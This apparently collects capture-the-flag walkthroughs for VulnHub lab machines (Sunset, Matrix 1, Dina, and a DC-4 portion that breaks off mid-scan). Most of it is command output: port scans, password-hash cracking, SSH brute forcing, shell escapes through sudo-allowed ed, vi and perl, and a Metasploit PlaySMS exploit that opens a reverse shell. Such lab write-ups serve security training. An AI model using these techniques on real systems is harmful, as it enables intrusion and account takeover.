VulnHub: Sunset Walkthrough

We first start off with an nmap scan of the remote host.

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.104

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-19 11:47 MST
Nmap scan report for 192.168.56.104
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.104:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
|   256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_  256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (EdDSA)
MAC Address: 08:00:27:13:81:5A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds
root@ubuntu:~/src# 

NMAP came back with two ports open 21 and 22. Lets connect to ftp and see what we can find there.

root@ubuntu:~# ftp 192.168.56.104
Connected to 192.168.56.104.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.104:root): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root         1062 Jul 29 00:00 backup
226 Transfer complete.
ftp> 

We see there is one file that we can download called 'backup'. Lets download the file and see what is contains. After we downloaded the 'backup' file we cat its contents.

root@ubuntu:~/src# cat backup
CREDENTIALS:                                                                                                                                                                                                       
office$6$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCravWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  
datacenter$6$3QWJ4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              
sky$6$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/   
root@ubuntu:~/src# 

It looks like some user names and password hashes lets fire up john and start cracking

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/sunset-hash.txt --format=sha512crypt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
space            (space)
cheer14          (sunset)
2g 0:00:00:13 DONE (2019-11-19 11:58) 0.1484g/s 1064p/s 1862c/s 1862C/s gerber..chanda
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#

We cracked two of the hashes we found our next step is to try and login to ssh with the following user names and passwords.

root@ubuntu:~/src# ssh sunset@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ECDSA key fingerprint is SHA256:n9ATwmONo6fCyPblqlvcO7WcIWZJMqBaqDdo/jYnLPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.104' (ECDSA) to the list of known hosts.
sunset@192.168.56.104's password: 
Linux sunset 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 28 20:52:38 2019 from 192.168.1.182
sunset@sunset:~$ 

We got a successful login with 'sunset' using the password 'cheer14' lets now check sudo rights of the user.

sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
sunset@sunset:~$ 

We can run the ed editor with no password. We can ofcourse break out in to a shell with the ed program by specifying the commmand '! /bin/bash' inside the editor.

sunset@sunset:~$ sudo /usr/bin/ed

! /bin/bash
root@sunset:/home/sunset# id
uid=0(root) gid=0(root) groups=0(root)
root@sunset:/home/sunset# whoami
root
root@sunset:/home/sunset#

We broke out in to a root shell now all thats left to do is cat the flag located in /root.

root@sunset:/home/sunset# cd /root
root@sunset:~# ls
flag.txt  ftp  server.sh
root@sunset:~# cat flag.txt
25d7ce0ee3cbf71efbac61f85d0c14fe
root@sunset:~# 

VulnHub: Matrix 1 Walkthrough

Lets first start off with an nmap scan of the remote host.

root@ubuntu:~/src# nmap -sC -sV -O -T5 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-17 16:29 MST
Nmap scan report for wordy (192.168.56.103)
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (EdDSA)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds
root@ubuntu:~/src# 

NMAP came back with three ports open 22,80 and 31337. Two of these look like web servers so lets visit the pages and see what they have to offer.

http://192.168.56.103:

http://192.168.56.103:31337

If we view source on the website on port 31337 we find a base64 encoded string embedded in the source code.

 class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

Decoded base64 in to:

root@ubuntu:~/src# echo ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg= | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
root@ubuntu:~/src# 

Cypher.matrix could be a user name or a file. Lets try it in the url and see what happens.

http://192.168.56.103:31337/Cypher.matrix

+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
...

We get back a file encoded in brainfuck our next task is to decode the text in to something readable. I went to this site to decode the file: https://www.splitbrain.org/_static/ook/

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

We get another hint this time on how to login to the box, but first we have to generate a password list according to the hint given. For that we will use crunch wordlist utiltiy.

root@ubuntu:~/src/crunch# ./crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@ubuntu:~/src/crunch# 

Next we will fire up hydra and start brute forcing the ssh server with our user guest and password list we just generated.

root@ubuntu:~/src/crunch# hydra -l guest -P /home/sam/src/crunch/dict.txt ssh://192.168.56.103
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-17 16:46:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[22][ssh] host: 192.168.56.103   login: guest   password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-17 16:47:16
root@ubuntu:~/src/crunch# 

We found the password for the user 'guest'. Now lets login to the ssh server and get a system shell.

root@ubuntu:~/src/crunch# ssh guest@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
guest@192.168.56.103's password: 
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$ 

We logged in successfully, but when we try to run commands we see that we are in a restricted bash environment.

guest@porteus:~$ pwd
/home/guest
guest@porteus:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$ 

One way we can break out of the rbash shell is to issue the vi command and within vi issue a :!/bin/bash command to break out in to a normal bash shell.

vi
:!/bin/bash

Once we execute the vi instructions we see that we can cd directory and run commands.

guest@porteus:~$ cd /home
guest@porteus:/home$ ls
guest/  trinity/
guest@porteus:/home$ 

If we check sudo rights for the user guest we get back interesting results.

guest@porteus:~$ sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
guest@porteus:~$ 

We can run all programs so in order for us to be able to use sudo su we need to first set up out new unrestricted shell with some path variables.

guest@porteus:/home$ export SHELL=/bin/bash:$SHELL
guest@porteus:/home$ export PATH=/usr/bin:$PATH
guest@porteus:/home$ export PATH=/bin:$PATH

After we set up the shell we can try and run 'sudo su' on the system to gain a root shell.

guest@porteus:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password: 
root@porteus:/home/guest# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@porteus:/home/guest# whoami
root
root@porteus:/home/guest# 

Now that we have root we can cd to /root and cat the flag.txt

root@porteus:/home/guest# cd /root
root@porteus:~# ls -la
total 74
drwx------ 16 root root 4096 Aug 14  2018 ./
drwxr-xr-x 51 root root 4096 Aug  6  2018 ../
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6187 Nov 18 00:05 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1184 Apr 22  2018 .bashrc
drwx------  5 root root 4096 Aug  6  2018 .cache/
drwxr-xr-x 21 root root 4096 Aug 13  2018 .config/
drwx------  3 root root 4096 Aug  6  2018 .dbus/
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4096 Aug  6  2018 .thumbnails/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Desktop/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Documents/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Downloads/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Music/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Pictures/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Public/
drwxr-xr-x  2 root root 4096 Aug  6  2018 Videos/
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
root@porteus:~# cat flag.txt
   _,-.                                                             
,-'  _|                  EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._              INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF                 
|`-._`-.\,-'_|  _,-'.                                               
     `-.|.-' | |`.-'|_     WHAT                                     
        |      |_|,-'_`.                                            
              |-._,-'  |     NO, ME NEITHER                         
         jrei | |    _,'                                            
              '-|_,-'          IT'S JUST A HYPOTHETICAL QUESTION    

root@porteus:~# 

VulnHub: Dina 1.0.1 Walkthrough

We first start off with an nmap scan against the remote host.

root@ubuntu:~/Downloads# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-14 19:44 MST
Nmap scan report for vtcsec (192.168.56.101)
Host is up (0.00043s latency).
Not shown: 993 closed ports
PORT      STATE    SERVICE      VERSION
80/tcp    open     http         Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
root@ubuntu:~/Downloads# 

NMAP came back with only port 80 open and the sites robots.txt file giving us some directories to browse.

User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads

Most of the directorys are empty but the 'nothing' contains a 404 error message. If we view source of the webpage we find a hint. view-source:http://192.168.56.101/nothing/

#my secret pass
freedom
password
helloworld!
diana
iloveroot

We have a list of passwords we can use later. Our next task was to run nikto against the host to see if it finds any thing of intrest.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-14 19:49:10 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 07:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8761 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2019-11-14 19:49:26 (GMT-7) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto came back with an intreseting directory 'secure' if we browse to the directory we find a zip file backup.zip http://192.168.56.101/secure/

If we download the archive file and try to open it we see that it is password protected. If you remember we got a list of passwords, lets try those passwords against the zip file. We found that the password for the zip archive is 'freedom' from the list we found eariler. We now extract the mp3 file and do a little foresnics.

root@ubuntu:~/Downloads# file backup-cred.mp3 
backup-cred.mp3: ASCII text
root@ubuntu:~/Downloads# 
root@ubuntu:~/Downloads# strings backup-cred.mp3 
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin
root@ubuntu:~/Downloads# 

The mp3 file is not a mp3 file at all but a text file. We run strings on the file and get back a message giving us a username and a url to visit. http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login

We have a login screen here where we will try the username touhid and the passwords from the list earlier.

username: touhid
#my secret pass
freedom
password
helloworld!
diana
iloveroot

http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_welcome

After we found a succesful login for touhid with the password diana. We next go on to searching for exploits for the PlaySMS software.

root@ubuntu:~/src/exploitdb# ./searchsploit playsms
------------------------------------------------------------------------------------------------------------- -------------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)                           | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload                           | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                                             | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)                       | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                                          | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                                                  | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                                               | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                                        | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                                      | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                                                 | exploits/php/webapps/30177.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb# 

We have a few choices, but I see there is a metasploit version which is the one we will use to get code executes and then a shell. Lets fire up metasploit and try it out.

msf5 > search playsms

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/playsms_filename_exec   2017-05-21       excellent  Yes    PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
   1  exploit/multi/http/playsms_uploadcsv_exec  2017-05-21       excellent  Yes    PlaySMS import.php Authenticated CSV File Upload Code Execution


msf5 > use exploit/multi/http/playsms_filename_exec
msf5 exploit(multi/http/playsms_filename_exec) > show info

       Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
     Module: exploit/multi/http/playsms_filename_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-05-21

Provided by:
  Touhid M.Shaikh 
  DarkS3curity

Available targets:
  Id  Name
  --  ----
  0   PlaySMS 1.4

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin            yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base playsms directory path
  USERNAME   admin            yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a code injection vulnerability within an 
  authenticated file upload feature in PlaySMS v1.4. This issue is 
  caused by improper file name handling in sendfromfile.php file. 
  Authenticated Users can upload a file and rename the file with a 
  malicious payload. This module was tested against PlaySMS 1.4 on 
  VulnHub's Dina 1.0 machine and Windows 7.

References:
  https://www.exploit-db.com/exploits/42003
  https://cvedetails.com/cve/CVE-2017-9080/
  https://www.youtube.com/watch?v=MuYoImvfpew
  http://touhidshaikh.com/blog/?p=336

msf5 exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
USERNAME => touhid
msf5 exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
PASSWORD => diana
msf5 exploit(multi/http/playsms_filename_exec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/playsms_filename_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin
TARGETURI => /SecreTSMSgatwayLogin
msf5 exploit(multi/http/playsms_filename_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:40206) at 2019-11-16 13:19:18 -0700

meterpreter > shell
Process 3741 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$

We got a shell after running the metasploit exploit module. Lets now try and enumerate the system to find a way to elevate our privleges.

www-data@Dina:/var/www/SecreTSMSgatwayLogin$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudoedit
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/arping
/usr/bin/X
/usr/bin/chfn
/usr/sbin/pppd
/usr/sbin/uuidd
/bin/ping6
/bin/umount
/bin/mount
/bin/ping
/bin/su
/bin/fusermount
www-data@Dina:/var/www/SecreTSMSgatwayLogin$

The find command for SUID able binaries didnt come back with anything interesting soo lets try sudo -l.

www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l 
sudo -l
Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ 

The user www-data can run sudo with no password using the perl binary. We issue a simple perl commandline and break out in to a root shell

www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo perl -e 'exec("/bin/sh -i");'
sudo perl -e 'exec("/bin/sh -i");'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# 

Now that we have root and there is to do is cat the flag.txt.

# cd /root
cd /root
# ls -la
ls -la
total 52
drwx------  6 root root 4096 Oct 17  2017 .
drwxr-xr-x 23 root root 4096 Oct 17  2017 ..
-rw-------  1 root root 2466 Oct 17  2017 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwxr-xr-x  3 root root 4096 Oct 17  2017 .cache
drwxr-xr-x  3 root root 4096 Oct 17  2017 .config
drwxr-xr-x  3 root root 4096 Oct 17  2017 .local
-rw-------  1 root root   55 Oct 17  2017 .mysql_history
-rw-------  1 root root    9 Oct 17  2017 .nano_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4096 Nov 15 08:13 .pulse
-rw-------  1 root root  256 Oct 17  2017 .pulse-cookie
-rw-r--r--  1 root root  639 Oct 17  2017 flag.txt
# cat flag.txt
cat flag.txt
________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))


root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....


CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6



# 

VulnHub: DC-4 Walkthrough

First we start off with a NMAP scan of the remote host.

root@ubuntu:~# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-02 10:18 MDT
Nmap scan report for dc-2 (192.168.56.101)
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (EdDSA)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:B3:AB:48 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@ubuntu:~# 

NMAP came back with two ports open: 22 and 80 lets fire up nikto and see what it finds on the server.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-02 10:21:32 (GMT-6)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7946 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2019-11-02 10:21:46 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto didnt find anything interesting lets run dirb against the remote host and cross our fingers.

root@ubuntu:~/src/nikto/program# dirb http://192.168.56.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov  2 10:23:52 2019
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/css/                                                                                                                                                              
